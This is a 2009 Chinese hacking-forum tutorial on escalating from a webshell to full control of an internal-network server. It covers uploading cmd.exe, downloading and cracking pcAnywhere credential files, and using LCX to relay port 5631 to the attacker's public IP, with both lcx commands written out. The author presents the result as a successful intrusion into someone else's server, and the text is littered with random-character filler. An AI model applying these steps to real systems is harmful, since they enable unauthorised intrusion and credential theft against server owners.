|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。; N( a/ A. A q9 W0 Q
7 n5 y% b5 \& h G8 w3 e提权方法:pcanywhere+LCX: p I0 F; H, N: R! i4 k' O
9 E" Y0 o2 A8 N$ ]获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
, E, P, q% c7 C; q! w+ q
3 x0 R; y9 N- [6 o5 `2 e! ]; h: x在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。3 L/ ?9 ~5 H7 W) v/ A
% Z1 d R! ^- U0 G. o e
b/ n3 x- p4 i1 R查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
7 e* e2 F: S+ W& w4 o, G# K8 u$ U8 S5 ]+ k7 R2 `& v" D w
0 B5 j$ l. i* v8 ]: H
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。% Y6 Z6 p- c* W! Q7 [3 Y2 V# {
5 L L+ T/ c) {: ]4 ^2 k/ _2 p0 T! x: K" a" b! c
6 Z3 T' `4 d* A8 h- e
% j3 s2 `4 @! \3 A" k7 B! }由于服务器在内网,那我们就要做端口转发,又要用到LCX啦`` L! G% O' X' C( j. V8 `
. c( ] w5 H; Q' W; c n# C
7 A' o( T/ F6 y& WLCX的用法再简单说下:8 E2 d4 G( P# K8 z9 `
5 E& g. x6 O4 [服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)/ r: ^: }# _+ G+ E& p
$ p3 V$ ]6 `4 }, B3 Y4 c0 i本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口). y- e6 y: \8 l& _ K1 s- z
/ j# i" V- M; \; X' o
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。8 U- q1 g: c4 T1 o7 Q. Z( d ?- N
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``. ]( p6 W; v& C- X1 k/ _. {
8 Z5 }7 _, A, b. Y& Y3 C7 N. c* T7 M0 I; K' \ O
8 a6 b3 o0 z0 `3 [7 \
9 U. S9 `$ r& \6 Z* `* h1 L6 w; h3 \呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。9 V" L% \1 `1 n: D- m
- e4 f0 p* `% r% f. H4 `
7 j. o( [: d' r4 C0 q0 P
, N* B1 b9 Z+ I; ~& s+ w8 N% R3 O7 z# u9 d4 @( h
我们本地连接试试,输入我们刚破解的账号密码
\/ U- h5 B. @8 ~
# } T d- L$ V7 p9 \
; ]( K) \+ J* l5 g# A/ T7 c呵呵``连接成功,服务器不错,又一个8核^︵^
& Q' w6 S. ]7 {6 y; _" P! z2 u( w4 O4 @& q9 Y7 Z: @0 e
% X7 B. L9 J+ d5 b+ `5 ^
0 m8 q7 j' b$ V7 P3 [# ` |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
